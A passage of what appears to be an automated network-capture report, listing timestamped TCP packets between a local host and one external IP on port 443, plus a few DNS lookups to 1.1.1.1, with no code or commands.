                                                                                                            Jan 10, 2025 23:09:57.031502962 CET50195443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:57.033972025 CET50197443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:57.034049034 CET44350197149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:57.034188986 CET50197443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:57.034593105 CET50197443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:57.034614086 CET44350197149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:57.648797989 CET44350197149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:57.648895025 CET50197443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:57.651258945 CET50197443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:57.651292086 CET44350197149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:57.651640892 CET44350197149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:57.756114006 CET50197443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:58.407044888 CET50197443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:58.407211065 CET44350197149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:58.407289028 CET50197443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:58.409717083 CET50199443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:58.409796000 CET44350199149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:58.409879923 CET50199443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:58.410162926 CET50199443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:58.410191059 CET44350199149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:59.033886909 CET44350199149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:59.035193920 CET50199443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:59.035775900 CET50199443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:59.035809040 CET44350199149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:59.036113977 CET44350199149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:59.247328043 CET44350199149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:59.251252890 CET50199443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:59.790291071 CET50199443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:59.790402889 CET44350199149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:59.790448904 CET50199443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:59.793685913 CET50201443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:59.793741941 CET44350201149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:09:59.793804884 CET50201443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:59.794174910 CET50201443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:09:59.794198036 CET44350201149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:00.446666002 CET44350201149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:00.446762085 CET50201443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:00.448990107 CET50201443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:00.449021101 CET44350201149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:00.449421883 CET44350201149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:00.646639109 CET50201443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:01.191560030 CET50201443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:01.191683054 CET44350201149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:01.191771030 CET50201443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:01.194811106 CET50203443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:01.194845915 CET44350203149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:01.195115089 CET50203443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:01.195429087 CET50203443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:01.195446014 CET44350203149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:01.833430052 CET44350203149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:01.833497047 CET50203443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:01.835179090 CET50203443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:01.835189104 CET44350203149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:01.835434914 CET44350203149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:01.943515062 CET50203443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:02.561431885 CET50203443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:02.561541080 CET44350203149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:02.561604977 CET50203443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:02.564531088 CET50205443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:02.564590931 CET44350205149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:02.564652920 CET50205443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:02.564966917 CET50205443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:02.564985991 CET44350205149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:03.205250978 CET44350205149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:03.205338001 CET50205443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:03.206864119 CET50205443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:03.206887007 CET44350205149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:03.207146883 CET44350205149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:03.256020069 CET50205443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:03.910471916 CET50205443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:03.910577059 CET44350205149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:03.910792112 CET44350205149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:03.910840988 CET50205443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:03.910868883 CET50205443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:03.913116932 CET50207443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:03.913167000 CET44350207149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:03.913224936 CET50207443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:03.913472891 CET50207443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:03.913489103 CET44350207149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:04.519417048 CET44350207149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:04.519488096 CET50207443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:04.521542072 CET50207443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:04.521558046 CET44350207149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:04.521796942 CET44350207149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:04.616961002 CET50207443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:05.280464888 CET50207443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:05.280658007 CET44350207149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:05.280822039 CET50207443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:05.283005953 CET50209443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:05.283056974 CET44350209149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:05.283734083 CET50209443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:05.284054995 CET50209443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:05.284069061 CET44350209149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:05.902708054 CET44350209149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:05.902781010 CET50209443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:05.904922009 CET50209443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:05.904932022 CET44350209149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:05.905183077 CET44350209149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:06.052898884 CET50209443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:06.624263048 CET50209443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:06.624376059 CET44350209149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:06.624499083 CET50209443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:06.627770901 CET50211443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:06.627801895 CET44350211149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:06.628038883 CET50211443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:06.628499031 CET50211443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:06.628509998 CET44350211149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:07.274878979 CET44350211149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:07.274952888 CET50211443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:07.276659012 CET50211443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:07.276673079 CET44350211149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:07.277153015 CET44350211149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:07.350017071 CET50211443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:07.983094931 CET50211443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:07.983253002 CET44350211149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:07.983333111 CET50211443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:07.985306978 CET50213443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:07.985361099 CET44350213149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:07.985430956 CET50213443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:07.985634089 CET50213443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:07.985651970 CET44350213149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:08.629381895 CET44350213149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:08.629647017 CET50213443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:08.631134987 CET50213443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:08.631165981 CET44350213149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:08.631529093 CET44350213149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:08.742460012 CET50213443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:09.346172094 CET50213443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:09.346458912 CET44350213149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:09.346545935 CET50213443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:09.348716021 CET50215443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:09.348789930 CET44350215149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:09.348879099 CET50215443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:09.349139929 CET50215443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:09.349174976 CET44350215149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:09.974257946 CET44350215149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:09.974350929 CET50215443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:09.976567984 CET50215443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:09.976597071 CET44350215149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:09.976872921 CET44350215149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:10.052931070 CET50215443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:10.703963041 CET50215443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:10.704123020 CET44350215149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:10.704248905 CET50215443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:10.707566977 CET50217443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:10.707616091 CET44350217149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:10.707668066 CET50217443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:10.708034992 CET50217443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:10.708049059 CET44350217149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:11.366873980 CET44350217149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:11.367007971 CET50217443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:11.369076014 CET50217443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:11.369091034 CET44350217149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:11.369322062 CET44350217149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:11.459199905 CET50217443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:12.182811975 CET50217443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:12.182981968 CET44350217149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:12.183073044 CET50217443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:12.187172890 CET50219443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:12.187206984 CET44350219149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:12.187669039 CET50219443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:12.188735962 CET50219443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:12.188749075 CET44350219149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:12.843662977 CET44350219149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:12.843739033 CET50219443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:12.845959902 CET50219443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:12.845971107 CET44350219149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:12.846307039 CET44350219149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:12.943557978 CET50219443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:13.617742062 CET50219443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:13.617908955 CET44350219149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:13.617974997 CET50219443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:13.620554924 CET50221443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:13.620568991 CET44350221149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:13.620733976 CET50221443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:13.620883942 CET50221443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:13.620894909 CET44350221149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:14.246972084 CET44350221149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:14.247092009 CET50221443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:14.249376059 CET50221443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:14.249387980 CET44350221149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:14.250236034 CET44350221149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:14.443608046 CET50221443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:14.955121994 CET50221443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:14.955354929 CET44350221149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:14.955429077 CET50221443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:14.958076954 CET50223443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:14.958116055 CET44350223149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:14.958184004 CET50223443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:14.958487988 CET50223443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:14.958502054 CET44350223149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:15.603287935 CET44350223149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:15.603378057 CET50223443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:15.604974985 CET50223443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:15.604984999 CET44350223149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:15.606014967 CET44350223149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:15.756093025 CET50223443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:16.328850031 CET50223443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:16.328975916 CET44350223149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:16.329147100 CET50223443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:16.331159115 CET50225443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:16.331197023 CET44350225149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:16.331294060 CET50225443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:16.331494093 CET50225443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:16.331505060 CET44350225149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:16.947850943 CET44350225149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:16.947953939 CET50225443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:16.952279091 CET50225443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:16.952285051 CET44350225149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:16.952766895 CET44350225149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:17.052969933 CET50225443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:17.714942932 CET50225443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:17.715070963 CET44350225149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:17.715125084 CET50225443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:17.718658924 CET50227443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:17.718688965 CET44350227149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:17.718776941 CET50227443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:17.719151020 CET50227443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:17.719166994 CET44350227149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:18.326770067 CET44350227149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:18.326838017 CET50227443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:18.328361988 CET50227443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:18.328370094 CET44350227149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:18.329241991 CET44350227149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:18.459269047 CET50227443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:19.066854954 CET50227443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:19.067087889 CET44350227149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:19.067334890 CET50227443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:19.071202993 CET50229443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:19.071306944 CET44350229149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:19.073333979 CET50229443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:19.073590040 CET50229443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:19.073626041 CET44350229149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:19.678838968 CET44350229149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:19.678911924 CET50229443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:19.681083918 CET50229443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:19.681104898 CET44350229149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:19.681485891 CET44350229149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:19.829576015 CET50229443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:20.439093113 CET50229443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:20.439273119 CET44350229149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:20.439367056 CET50229443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:20.447398901 CET50231443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:20.447444916 CET44350231149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:20.447511911 CET50231443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:20.447856903 CET50231443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:20.447868109 CET44350231149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:21.067693949 CET44350231149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:21.068418026 CET50231443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:21.070231915 CET50231443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:21.070245981 CET44350231149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:21.070514917 CET44350231149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:21.259212971 CET50231443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:21.802802086 CET50231443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:21.802911997 CET44350231149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:21.802977085 CET50231443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:21.805783033 CET50233443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:21.805855036 CET44350233149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:21.805912971 CET50233443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:21.806273937 CET50233443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:21.806289911 CET44350233149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:22.467492104 CET44350233149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:22.467757940 CET50233443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:22.469532967 CET50233443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:22.469561100 CET44350233149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:22.469873905 CET44350233149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:22.646845102 CET50233443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:23.205921888 CET50233443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:23.206130981 CET44350233149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:23.206218958 CET50233443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:23.208635092 CET50235443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:23.208674908 CET44350235149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:23.208833933 CET50235443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:23.209108114 CET50235443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:23.209122896 CET44350235149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:23.849739075 CET44350235149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:23.849879026 CET50235443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:23.851898909 CET50235443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:23.851911068 CET44350235149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:23.852165937 CET44350235149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:23.943638086 CET50235443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:24.620610952 CET50235443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:24.620723963 CET44350235149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:24.620790005 CET50235443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:24.624416113 CET50237443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:24.624458075 CET44350237149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:24.624516964 CET50237443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:24.624989033 CET50237443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:24.625001907 CET44350237149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:25.255177975 CET44350237149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:25.255263090 CET50237443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:25.257605076 CET50237443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:25.257625103 CET44350237149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:25.257916927 CET44350237149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:25.443640947 CET50237443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.002281904 CET50237443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.002507925 CET44350237149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:26.002629995 CET50237443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.004834890 CET50239443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.004884958 CET44350239149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:26.005116940 CET50239443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.005417109 CET50239443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.005439997 CET44350239149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:26.636681080 CET44350239149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:26.636780977 CET50239443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.638433933 CET50239443192.168.2.7149.154.167.220
                                                                                                            Jan 10, 2025 23:10:26.638448000 CET44350239149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:26.638688087 CET44350239149.154.167.220192.168.2.7
                                                                                                            Jan 10, 2025 23:10:26.692662001 CET50239443192.168.2.7149.154.167.220

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 10, 2025 23:06:15.253376007 CET6131653192.168.2.71.1.1.1
                                                                                                            Jan 10, 2025 23:06:23.155838013 CET5571653192.168.2.71.1.1.1
                                                                                                            Jan 10, 2025 23:06:23.163252115 CET53557161.1.1.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:24.705132008 CET5480353192.168.2.71.1.1.1
                                                                                                            Jan 10, 2025 23:06:24.712431908 CET53548031.1.1.1192.168.2.7
                                                                                                            Jan 10, 2025 23:06:35.759605885 CET5475953192.168.2.71.1.1.1
                                                                                                            Jan 10, 2025 23:06:35.766526937 CET53547591.1.1.1192.168.2.7
                                                                                                            Jan 10, 2025 23:07:10.113006115 CET6161053192.168.2.71.1.1.1
                                                                                                            Jan 10, 2025 23:07:10.119829893 CET53616101.1.1.1192.168.2.7

                                                                                                            DNS Queries

